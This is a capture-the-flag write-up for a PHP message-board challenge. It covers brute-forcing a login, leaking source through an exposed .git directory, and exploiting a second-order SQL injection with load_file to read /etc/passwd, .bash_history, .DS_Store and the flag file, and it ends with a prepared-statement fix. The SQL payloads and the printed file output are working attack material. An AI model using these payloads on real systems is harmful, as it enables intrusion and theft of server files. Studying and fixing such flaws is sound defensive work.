- The login page gives a hint:

  username: zhangwei password: zhangweixxx

  The last three characters evidently have to be brute-forced. On a hunch that they are digits, I went straight to brute-forcing them; the last three characters turned out to be 666. Log in.
- Scanning the site turns up an exposed .git directory. Pulling it with GitHack gives:

  ```php
  <?php
  include "mysql.php";
  session_start();
  if($_SESSION['login'] != 'yes'){
      header("Location: ./login.php");
      die();
  }
  if(isset($_GET['do'])){
      switch ($_GET['do']) {
          case 'write':
              break;
          case 'comment':
              break;
          default:
              header("Location: ./index.php");
      }
  } else{
      header("Location: ./index.php");
  }
  ?>
  ```

  In this source, if do is write or comment the code just breaks out of the switch. But testing shows that posting uses do=write and commenting uses do=comment, so the source above is incomplete. Consider recovering the full source. The tool used was BugScanTeam's GitHack; during recovery I used Python to decompress the object file under 8e and got the complete source:

  ```python
  import zlib

  # Loose git objects are zlib-compressed: read the object as bytes and inflate it.
  with open("./f569f235780f24c42b60f50d528a03f7238c80", "rb") as f:
      data = f.read()
  print(zlib.decompress(data).decode("utf-8", errors="replace"))
  ```

  The full source:

  ```php
  <?php
  include "mysql.php";
  session_start();
  if($_SESSION['login'] != 'yes'){
      header("Location: ./login.php");
      die();
  }
  if(isset($_GET['do'])){
      switch ($_GET['do']) {
          case 'write':
              // First write: every field is escaped with addslashes() before insertion.
              $category = addslashes($_POST['category']);
              $title = addslashes($_POST['title']);
              $content = addslashes($_POST['content']);
              $sql = "insert into board set category = '$category', title = '$title', content = '$content'";
              $result = mysql_query($sql);
              header("Location: ./index.php");
              break;
          case 'comment':
              $bo_id = addslashes($_POST['bo_id']);
              $sql = "select category from board where id='$bo_id'";
              $result = mysql_query($sql);
              $num = mysql_num_rows($result);
              if($num>0){
                  // Second use: category is read back from the database and spliced
                  // into a new query without any escaping.
                  $category = mysql_fetch_array($result)['category'];
                  $content = addslashes($_POST['content']);
                  $sql = "insert into comment set category = '$category', content = '$content', bo_id = '$bo_id'";
                  $result = mysql_query($sql);
              }
              header("Location: ./comment.php?id=$bo_id");
              break;
          default:
              header("Location: ./index.php");
      }
  }else{
      header("Location: ./index.php");
  }
  ?>
  ```
  One look at the source shows a second-order injection. The condition for a second-order injection is that the value is filtered when it is first inserted into a table, but not when it is later selected from the table and used in another operation. Searching the source for this pattern, category is the second-order injection point: it is escaped with addslashes() when the post is written, but in the comment branch it is read back from board and concatenated into the next insert unescaped. When a comment is posted, the comment we entered is displayed, so this is presumably an echo point. Construct the statement as follows:

  ```sql
  insert into comment set category='1',content=(select database()),/* content='*/#', bo_id='$bo_id'
  ```

  Note the use of comment markers here: /*...*/ comments out the middle section and # comments out the rest of the line, so the query result is echoed back through content. I looked around the database and did not find the flag anywhere, but load_file was available, so:

  ```sql
  insert into comment set category='1',content=(select load_file('/etc/passwd')),/* content='*/#', bo_id='$bo_id'
  ```
  This returns:

  ```
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  bin:x:2:2:bin:/bin:/usr/sbin/nologin
  sys:x:3:3:sys:/dev:/usr/sbin/nologin
  sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/usr/sbin/nologin
  man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  libuuid:x:100:101::/var/lib/libuuid:
  syslog:x:101:104::/home/syslog:/bin/false
  mysql:x:102:105:MySQL Server,,,:/var/lib/mysql:/bin/false
  www:x:500:500:www:/home/www:/bin/bash
  ```
  There is a www user here. First look at the .bash_history under /home/www:

  ```sql
  select load_file('/home/www/html/.bash_history')
  ```

  which gives:

  ```
  cd /tmp/
  unzip html.zip
  rm -f html.zip
  cp -r html /var/www/
  cd /var/www/html/
  rm -f .DS_Store
  service apache2 start
  ```

  From these history commands we can see that /tmp/html still has a .DS_Store file (it was only deleted from the copy in /var/www/html), so:

  ```sql
  select load_file('/tmp/html/.DS_Store')
  ```

  The output is displayed incompletely, so instead:

  ```sql
  select hex(load_file('/tmp/html/.DS_Store'))
  ```

  Decoding the hex reveals the file names recorded in the .DS_Store, including the flag file, so read it:

  ```sql
  select load_file('/var/www/html/flag_8946e1ff1ee3e40f.php')
  ```

  or

  ```sql
  select load_file('/tmp/html/flag_8946e1ff1ee3e40f.php')
  ```

  and get the flag.
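As an added example (not the challenge's own code), here is the comment branch rewritten so that the category read back from board is bound as a parameter instead of being spliced into the second query, which removes the second-order injection; the PDO DSN and credentials are placeholders and are assumed to live in mysql.php.

```php
<?php
// Added example, not the challenge's code: the 'comment' branch from the
// leaked source using PDO prepared statements for both the read and the write.
// The DSN and credentials below are placeholders.
$pdo = new PDO('mysql:host=localhost;dbname=CHANGEME;charset=utf8mb4',
               'CHANGEME_USER', 'CHANGEME_PASSWORD', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // use real server-side prepares
]);

function add_comment(PDO $pdo, string $bo_id, string $content): ?int
{
    // bo_id is only ever used as a number, so reject anything else outright
    // rather than relying on escaping.
    if (!ctype_digit($bo_id)) {
        return null;
    }
    $id = (int) $bo_id;

    $stmt = $pdo->prepare('SELECT category FROM board WHERE id = ?');
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;
    }

    // The stored category travels as a bound parameter: even if it contains
    // quotes or comment sequences, it lands in the column as literal text
    // and can no longer rewrite the INSERT.
    $stmt = $pdo->prepare(
        'INSERT INTO comment (category, content, bo_id) VALUES (?, ?, ?)'
    );
    $stmt->execute([$row['category'], $content, $id]);
    return $id;
}

$id = add_comment($pdo, $_POST['bo_id'] ?? '', $_POST['content'] ?? '');
if ($id === null) {
    header('Location: ./index.php');
    exit;
}
header('Location: ./comment.php?id=' . $id);
```

With both statements parameterized, addslashes() is no longer needed on the write path either; the same change applies to the write branch.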